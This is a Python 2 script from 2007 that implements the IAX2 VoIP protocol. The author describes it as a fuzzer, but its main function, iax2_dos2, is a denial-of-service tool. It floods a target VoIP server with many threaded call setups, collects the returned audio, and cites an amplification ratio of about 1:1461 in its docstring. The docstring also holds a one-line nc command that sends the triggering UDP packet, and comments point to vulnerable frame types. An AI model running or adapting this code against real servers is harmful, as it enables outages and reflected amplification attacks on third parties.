#!/usr/bin/env python

"""
altsci_iax2.py
by Javantea aka. Joel R. Voss
May 15, 2007

Released under GNU GPL, read the file 'COPYING' for more information

IAX2 implementation from RFC and reverse engineering.
It works as far as the first packet is accepted. The ACK doesn't seem to 
succeed.
It should be a pretty good fuzzer.

The single udp packet that starts the incoming dialplan is:
80eb 0000 0000 0007 0000 0601 0804 0000 02aa

python -c "print '\x80\xeb\x00\x00\x00\x00\x00\x07\x00\x00\x06\x01\x08\x04\x00\x00\x02\xaa'" | head -c 18 | nc -u 192.168.0.3 4569
26307 bytes in 723 packets in exactly 32.0032 seconds.
6576.75 bits per second.
(13:50:16) craSH: 1:1461 is indeed pretty big ya? werent those DNS 
amplification attacks and BGP ones only like 1:400 or so maybe?

"""

from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
import base64
import struct
from time import time
#from md5 import md5

# Optional libraries to play gsm.
try:
	import pygsm3
	import alsaaudio
except:
	print 'No audio, sorry.'
	# Make these tests fail.
	pygsm3 = None
	alsaaudio = None
#end try

# Frame types
IAX_FRAMETYPE = {
'FT_DTMF':1,
'FT_VOICE':2,
'FT_VIDEO':3, # Looks like there's a vulnerability in this one too.
'FT_CONTROL':4,
'FT_NULL':5,
'FT_IAXCTL':6,
'FT_TEXT':7, # There's a vulnerability in this one to my knowledge.
'FT_IMAGE':8,
'FT_HTML':9,
'FT_CNG':10,
'FT_MODEM':11,
'FT_DTMF_BEGIN':12
}

IAXCTL_SUBCLASS = {
'IC_NEW':1,
'IC_PING':2,
'IC_ACK':4,
'IC_HANGUP':5,
'IC_REJECT':6,
'IC_ACCEPT':7,
'IC_AUTHREQ':8,
'IC_AUTHREP':9,
'IC_INVAL':10,
'IC_LAGRQ':11,
'IC_LAGRP':12,
'IC_REGREQ':13,
'IC_REGAUTH':14,
'IC_REGACK':15,
'IC_REGREJ':16,
'IC_REGREL':17,
'IC_VNAK':18,
'IC_DPREQ':19,
'IC_DPREP':20,
'IC_DIAL':21,
'IC_TXREQ':22,
'IC_TXCNT':23,
'IC_TXACC':24,
'IC_TXREADY':25,
'IC_TXREL':26,
'IC_TXREJ':27,
'IC_QUELCH':28,
'IC_UNQUELCH':29,
'IC_POKE':30,
'IC_PAGE':31,
'IC_MWI':32,
'IC_UNSUPPORT':33,
'IC_TRANSFER':34
}

# IAX Information elements
IAX_IE_TYPE = {
'IAX_IE_CALLED_NUMBER':1,		#  Number/extension being called - string */
'IAX_IE_CALLING_NUMBER':2,		#  Calling number - string */
'IAX_IE_CALLING_ANI':3,			#  Calling number ANI for billing  - string */
'IAX_IE_CALLING_NAME':4,		#  Name of caller - string */
'IAX_IE_CALLED_CONTEXT':5,		#  Context for number - string */
'IAX_IE_USERNAME':6,			#  Username (peer or user) for authentication - string */
'IAX_IE_PASSWORD':7,		#  Password for authentication - string */
'IAX_IE_CAPABILITY':8,		#  Actual codec capability - unsigned int */
'IAX_IE_FORMAT':9,			#  Desired codec format - unsigned int */
'IAX_IE_LANGUAGE':10,		#  Desired language - string */
'IAX_IE_VERSION':11,		#  Protocol version - short */
'IAX_IE_ADSICPE':12,		#  CPE ADSI capability - short */
'IAX_IE_DNID':13,			#  Originally dialed DNID - string */
'IAX_IE_AUTHMETHODS':14,	#  Authentication method(s) - short */
'IAX_IE_CHALLENGE':15,		#  Challenge data for MD5/RSA - string */
'IAX_IE_MD5_RESULT':16,		#  MD5 challenge result - string */
'IAX_IE_RSA_RESULT':17,		#  RSA challenge result - string */
'IAX_IE_APPARENT_ADDR':18,	#  Apparent address of peer - struct sockaddr_in */
'IAX_IE_REFRESH':19,		#  When to refresh registration - short */
'IAX_IE_DPSTATUS':20,		#  Dialplan status - short */
'IAX_IE_CALLNO':21,			#  Call number of peer - short */
'IAX_IE_CAUSE':22,			#  Cause - string */
'IAX_IE_IAX_UNKNOWN':23,	#  Unknown IAX command - byte */
'IAX_IE_MSGCOUNT':24,		#  How many messages waiting - short */
'IAX_IE_AUTOANSWER':25,		#  Request auto-answering -- none */
'IAX_IE_MUSICONHOLD':26,	#  Request musiconhold with QUELCH -- none or string */
'IAX_IE_TRANSFERID':27,		#  Transfer Request Identifier -- int */
'IAX_IE_RDNIS':28,			#  Referring DNIS -- string */
'IAX_IE_PROVISIONING':29,	#  Provisioning info */
'IAX_IE_AESPROVISIONING':30,	#  AES Provisioning info */
'IAX_IE_DATETIME':31		#  Date/Time */
}

class IAX_session:
	def __init__(self, host, port=4569, src=235, dest=0, verbose=True):
		self.verbose = verbose
		self.start_time = time()*1000
		self.s = socket(AF_INET, SOCK_DGRAM)
		self.s.connect((host, port))
		if self.verbose: print 'Connected:', self.s.getsockname()
		
		self.my_iseq = 0
		self.my_oseq = 0
		self.src = src
		self.dest = dest
	#end def __init__(self, host, port=4569)
	
	def send(self, data='', full_frame=1, retrans=0, frame_type = IAX_FRAMETYPE['FT_IAXCTL'], subclass = IAXCTL_SUBCLASS['IC_NEW']):
		#src = 235
		#full_frame = 1
		ff = full_frame << 15
		frame_data = struct.pack('>H', self.src+ff)
		
		#dest = 0
		#retrans = 0
		rt = retrans << 15
		frame_data += struct.pack('>H', self.dest+rt)
		
		timestamp = int(time()*1000 - self.start_time)
		frame_data += struct.pack('>L', timestamp)
		
		# FIXME: Why are oseq and iseq zero?
		oseq = self.my_oseq
		iseq = self.my_iseq
		#frame_type = FT_IAXCTL
		# uhh why would we want c to be a power of 2?
		c = 0
		#subclass = IC_NEW
		sc = subclass + c << 7
		
		frame_data += struct.pack('>BBBB', oseq % 256, iseq % 256, frame_type % 256, subclass % 256)
		
		frame_data += data
		
		self.s.send(frame_data)
		self.my_oseq += 1
	#end def send([data, full_frame, src, dest, rt, oseq, iseq, frame_type, subclass])
	
	def recv(self):
		in_data = self.s.recv(1024)
		out_data = {}
		if self.verbose: print len(in_data), base64.b16encode(in_data)
		(src, dst) = struct.unpack(">HH", in_data[0:4])
		ff = (src & 0x8000) >> 15
		rt = (dst & 0x8000) >> 15
		src = src & ~0x8000
		dst = dst & ~0x8000
		if src != self.dest or dst != self.dest:
			print 'switching src/dest'
			self.src = dst
			self.dest = src
		#end if
		if self.verbose: print 'ff =', ff
		if self.verbose: print 'src =', src
		if ff == 1:
			if self.verbose: print 'rt =', rt
			if self.verbose: print 'dst =', dst
			(timestamp,) = struct.unpack(">L", in_data[4:8])
			(oseq, iseq, frame_type, subclass) = struct.unpack('>BBBB', in_data[8:12])
			if self.verbose: print 'time =', timestamp
			if self.verbose: print 'oseq =', oseq
			if self.verbose: print 'iseq =', iseq
			sft = frame_type
			if frame_type in IAX_FRAMETYPE.values():
				sft = IAX_FRAMETYPE.keys()[IAX_FRAMETYPE.values().index(frame_type)]
			#end if
			if self.verbose: print 'ft =', sft
			ssc = subclass
			ies = []
			if frame_type == IAX_FRAMETYPE['FT_IAXCTL']:
				ssc = IAXCTL_SUBCLASS.keys()[IAXCTL_SUBCLASS.values().index(subclass)]
				if self.verbose: print 'sc =', ssc
				
				# Data is made up of multiple ie's
				if self.verbose: print 'data =', base64.b16encode(in_data[12:])
				pos = 12
				while pos < len(in_data):
					(ie, dlen) = struct.unpack('>BB', in_data[pos:pos+2])
					sie = ie
					if ie in IAX_IE_TYPE.values():
						sie = IAX_IE_TYPE.keys()[IAX_IE_TYPE.values().index(ie)]
					#end if
					data = in_data[pos+2:pos+2+dlen]
					if self.verbose: print 'ie =', sie
					if self.verbose: print 'dlen =', dlen
					if self.verbose: print 'msg =', repr(data)
					ies.append((ie, data))
					pos += 2+dlen
				#loop
			elif frame_type == IAX_FRAMETYPE['FT_VOICE']:
				if self.verbose: print 'sc =', ssc
				if self.verbose: print 'mdata =', base64.b16encode(in_data[12:])
				if pygsm3:
					out_data['pcm'] = pygsm3.decode(in_data[12:])
					print 'pcm3', len(out_data['pcm'])
				else:
					out_data['gsm'] = in_data[12:]
				#end if
			else:
				if self.verbose: print 'learn'
			#end if
			
			# iseq increases when we receive a full frame.
			if ff:
				self.my_iseq += 1
			#end if
			return (frame_type, subclass, ies, ff, out_data)
		else:
			(timestamp, ) = struct.unpack(">H", in_data[2:4])
			if self.verbose: print 'time =', timestamp
			if self.verbose: print 'mdata =', base64.b16encode(in_data[4:])
			#if self.verbose: print 'z', len(in_data) - 4
			if pygsm3:
				out_data['pcm'] = pygsm3.decode(in_data[4:])
				print 'pcm4', len(out_data['pcm'])
			else:
				out_data['gsm'] = in_data[4:]
			#end if
			return (0, 0, [], 0, out_data)
		#end if
	#end def recv()
	def close(self):
		self.s.close()
	#end def close()
#end class IAX_session

def IAX_create_ie(ie_type, data):
	if len(data) > 256:
		print "Error creating ie of length:", len(data)
		return ''
	#end def
	output = struct.pack('>BB', ie_type, len(data))
	output += data
	return output
#end def IAX_create_ie(ie_type, data)

def pack_long(data):
	return struct.pack('>L', data)
#end def pack_long(data)


def iax2_dos2(host, port=4569, aout=None, out_filename='', verbose=True):
	pcm_data = ''
	
	outfile = None
	if out_filename != '':
		outfile = file(out_filename, 'w')
	#end if
	
	session = IAX_session(host, port, verbose)
	
	# Capability == GSM, ...
	data = IAX_create_ie(IAX_IE_TYPE['IAX_IE_CAPABILITY'], pack_long(0x000002aa))
	# Reqd Version, Called number, codec prefs, Calling Presentation, 
	# Calling TON, Calling TNS, Format?
	session.send(data)
	
	# Receive a few times because it goes:
	# VNAK, LAGRQ, LAGRQ, PING, LAGRQ, PING, ...
	# or:
	# IC_ACCEPT, FT_CONTROL 4, FT_VOICE 2, IC_ACCEPT rt, ...
	
	resp = session.recv()
	
	doit = 0
	if resp[0] == IAX_FRAMETYPE['FT_IAXCTL'] and resp[1] == IAXCTL_SUBCLASS['IC_ACCEPT']:
		print "Accepted, let's ack"
		#data = IAX_create_ie(IAX_IE_TYPE['IAX_IE_CAPABILITY'])
		data = ''
		session.send(data, frame_type = IAX_FRAMETYPE['FT_IAXCTL'], subclass = IAXCTL_SUBCLASS['IC_ACK'])
		#doit = 1
	#end if
	
	for i in range(622):
		resp = session.recv()
		if aout and len(resp) == 5 and 'pcm' in resp[4]:
			pcm_data += resp[4]['pcm']
		if outfile and len(resp) == 5 and 'gsm' in resp[4]:
			outfile.write(resp[4]['gsm'])
		#end if
		if verbose: print
		
		if len(pcm_data) > 8000*2:
			if aout: aout.write(pcm_data)
			pcm_data = ''
		#end if
	#next i
	
	session.close()
	if outfile: outfile.close()
	if aout and len(pcm_data) > 0:
		aout.write(pcm_data)
		pcm_data = ''
	#end if
#end def iax2_dos2(host, [port=4569], [aout=None], [out_filename=''], [verbose=True])

def main():
	"""
	Usage:
	python altsci_iax2.py [-s] [-q] [-c count] [host] [port] [out_filename]
	-c count runs count threads. If count is 1, it does not thread and plays.
	-s exits after starting count threads.
	-q turns off verbose output.
	"""
	host = '192.168.0.3'
	port = 4569
	out_filename = ''
	aout = None
	verbose = True
	count = 15
	play_insanely = True
	from sys import argv
	if '-s' in argv:
		play_insanely = False
		argv.pop(argv.index('-s'))
	#end if
	if '-c' in argv:
		pos = argv.index('-c')
		argv.pop(pos)
		if len(argv) > pos:
			try:
				count = int(argv[pos])
				argv.pop(pos)
			except:
				print "Invalid count:", argv[pos]
			#end try
		#end if
	#end if
	if '-q' in argv:
		verbose = False
		argv.pop(argv.index('-q'))
	#end if
	
	if len(argv) >= 2:
		host = argv[1]
	#end if
	if len(argv) >= 3:
		try:
			port = int(argv[2])
		except:
			print "Invalid port:", argv[2]
			port = 4569
		#end try
	#end if
	if len(argv) >= 4:
		out_filename = argv[3]
	#end if
	
	if alsaaudio:
		# Open the onboard device in playback mode.
		aout = alsaaudio.PCM(alsaaudio.PCM_PLAYBACK, alsaaudio.PCM_NORMAL, 'plug:i8x0')
		# Open the default device in playback mode.
		#aout = alsaaudio.PCM(alsaaudio.PCM_PLAYBACK)
		
		# Set attributes: Mono, 8000 Hz, 16 bit little endian frames
		aout.setchannels(2)
		aout.setrate(8000)
		aout.setformat(alsaaudio.PCM_FORMAT_S16_LE)
		
		# The period size controls the internal number of frames per period.
		# The significance of this parameter is documented in the ALSA api.
		aout.setperiodsize(160)
	#end if
	
	try:
		if count == 1:
			iax2_dos2(host, port, aout, out_filename, verbose)
		else:
			# Run a bunch simultaneously with threading.
			import threading
			threads = []
			for i in range(count):
				a = threading.Thread(target=iax2_dos2, args=(host, port, aout, out_filename, verbose))
				a.setDaemon(False)
				a.start()
				threads.append(a)
			#next i
			if play_insanely:
				# Wait until they're all done.
				for thread in threads:
					thread.join()
				#next i
			#end if
		#end if
	except KeyboardInterrupt:
		# A very narrow exception to allow ctrl-c to exit sanely.
		pass
	#end try
#end def main()

if __name__ == '__main__':
	main()
#end if
